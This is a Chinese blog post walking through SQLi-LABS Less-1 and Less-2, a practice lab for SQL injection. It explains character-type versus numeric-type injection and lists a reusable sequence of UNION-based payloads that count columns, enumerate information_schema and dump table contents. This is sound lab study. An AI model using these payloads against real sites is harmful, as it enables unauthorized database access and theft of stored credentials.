SQLi-LABS Less-1&&Less-2

已于 2022-04-23 14:10:21 修改
阅读量281 收藏 2
点赞数 1
文章标签: 学习 web安全
于 2022-04-09 15:10:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64898960/article/details/124057153
版权

最基础的SQL注入

审题(Less-1)

Less-1题目如下
在这里插入图片描述
由英文提示我们可以得知我们需要传入的参数名字为ID
在这里插入图片描述
于是我们尝试使用get方式传入参数,得到下图
在这里插入图片描述
因为这是SQL注入的实验室,所以我们就不进行是否存在SQL注入的判断了,直接开始注入流程。

猜字段数

在这里插入图片描述
在这里插入图片描述
由此得知字段数为3,然后我们进行下一步

获得显示位

在这里插入图片描述

查询库名

在这里插入图片描述

查询表名

在这里插入图片描述

查询列名

这里我查询了users这个列名
在这里插入图片描述

获得你需要的内容

在ctf里面,flag一般都在列名里面,至于要查询哪一个表、哪一个列都是需要自己去判断的
在这里插入图片描述

SQL注入的套路语句(适用于无任何过滤的情况下)

?id=1'order by 1--+(猜字段数,下面假设字段数为3)
?id=-1'union select 1,2,3--+(获得显示位)
?id=-1'union select 1,database(),3--+(查库名)
?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='库名'--+(查表)
?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='列名'--+(查列)
?id=-1'union select 1,group_concat(列里面的内容),3 from 列名--+

SQL的另一个知识点(Less-2)

字符型注入和数字型注入

在Less-1输入:?id=’ 1and 1=1’ 的时候是会报错的
在这里插入图片描述
而在Less-2却不会,这就是因为Less-2需要使用的是数字型注入
在这里插入图片描述
Less-2的套路跟Less-1一样,唯一的区别就是不需要闭合参数,即把 == ?id=1’ == 1后面的“ ’ ” 去掉
在这里插入图片描述

?id=1 order by 1--+(猜字段数,下面假设字段数为3)
?id=-1 union select 1,2,3--+(获得显示位)
?id=-1 union select 1,database(),3--+(查库名)
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='库名'--+(查表)
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='列名'--+(查列)
?id=-1 union select 1,group_concat(列里面的内容),3 from 列名--+

总结

数字型注入和字符型注入的区别

数字型注入:当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。
字符型注入:当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。

参考文章

Livvm
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs-master靶场第二关详解
tangtang_888的博客
07-06 1755
1、点击进入sqli-labs-master靶场第二关Less-2 2、输入?id=1' and '1'='1,回显不正常,说明此处为数字型注入 3、依次输入?id=1 order by (1,2,3,4)--+,在输入4时出现报错,说明字段数为3
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs练习之 Less-2
博客地址 www.sec0nd.top
06-06 213
sql基础操作 查库:select schema_name from information_schema. schemata; 查表:select table_name from information_schema.tables where table_schema=‘security’; 查列:select column_name from information_schema.columns where table_name=‘users’ 查字段:select username,password
sqli-labs之less2
weixin_44791273的博客
09-11 239
Please input the ID as parameter with numeric value:请以数字值作为参数输入用户标示符 ?id=0 不存在 ?id=1 存在 ?id=0‘时 ‘’ LIMIT 0,1’
sqli注入详解——>sqli-labs less-1~65
最新发布
qq_51780583的博客
03-18 628
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
sqli-labs靶场 Less-2(详细版)
m0_57671135的博客
06-19 141
id=-1 union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users'id=-1 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()接下来联合查询,首先需要判断列数?
sqli-labs学习(less-1-less-4)
weixin_30908649的博客
11-25 178
学习sqli-labs之前先介绍一些函数,以便于下面的payload看的懂 group_concat函数 将查询出来的多个结果连接成一个字符串结果,用于在一个回显显示多个结果 同理的还有 concat_ws() limit star,size用法 start:从第几条记录开始。 size:读取几条记录。 sqli-lab-1 关键代码 $sql="SELE...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs通关(less1~less10)
热门推荐
箭雨镜屋
08-16 1万+
这10关都是GET型的,包括了union注入、报错注入、布尔盲注和时间盲注,虽然包含了几种闭合方式,但是没有涉及到过滤和绕过,是最基础的关卡。
sqli-labs/Less-2/布尔型注入
m0_75178803的博客
04-17 80
得到数据库用户,数据库版本,操作系统,和数据库名字。第二个页面报错,说明是数字型注入。4.查询指定数据库下的表名。5.查询指定表名下的列名。说明有3个列名字段数。
为什么C语言输出结果总是1,在C语言中 int a,b,x; x=(a=-1)&&(b=-2); 之后输出x的值为什么是1...
weixin_36335903的博客
05-19 1257
在C语言中 int a,b,x; x=(a=-1)&&(b=-2); 之后输出x的值为什么是1以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!在C语言中 int a,b,x; x=(a=-1)&&(b=-2); 之后输出x的值为什么是1&&是逻辑与,因为a不为0,所以继续看...
从零记录sqli-labs学习过程 Less-1&&Less-2
fpxnb1的博客
03-23 1394
简单记录一下从零开始学习SQL注入过程,从sqli-labs练习开始
sql注入系列之Sqli-labs(less-2)
BetsyMyGirl的博客
11-30 1424
判断注入点 http://192.168.81.210/sqli/Less-2/?id=1’输入单引号发现出现了sql语句报错,可以知道单引号已经进入到数据库里执行了,语句类似于 select * from users where id =1' limit 0,1 因为正常的情况下,用户只能将搜索的参数传入到数据库里面进行查询,是不可能去修改查询语句的,上方的报错就是由于用户修改了查询的语句而引起的,将以上语句代入到自己的数据库里执行也是会报错的,因为多了一个单引号。 判断注入类型 输入1 and 1=1
Sqli 的Less-1和less-2操作步骤 ,求出username和password下的字段内容
m0_52341820的博客
04-13 406
Less-1: 进入Less-1页面: 检查页面是否存在sql注入,输入敏感字符%27,出现报错,说明存在注入漏洞。 判断查询表的列数:使用order by语句和二分法探测出列数为三 之后判断显示位:使用union select联合查询语句判断显示位,若希望显示出后面的,需要将union语句的前半部分显示为假 之后求当前数据库的名字,得出数据库名等于secuirty 之后查询数据的下的表名:http://127.0.0.1/sqli/Less-1/?id=-1' %20%20 un.
sqli靶场通关之less2
sunxueer的博客
07-15 412
sqli靶场 less2 方法一:union联合查询 1. 求闭合字符 id=1 //无异常 id=1 and 1 =1 -- + //正确显示 id=1 and 1 =2 -- + //错误 说明有可能存在数字型SQL注入 2. 求列数 id=1 order by 3 -- + id=1 order by 4 -- + 说明有3列 3. 求显示位 id=-1 union select 1,2,3 -- + 4. 爆数据库名 id=1 and 1=2 union select 1,
sqli-libs————Less2(数字型注入)
Fly_鹏程万里
05-08 1153
Less2同样,我们根据提示传入参数id,数据类型为numeric加入单引号进行测试:爆出错误提示信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' ...
sqli-labs less
07-28
common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值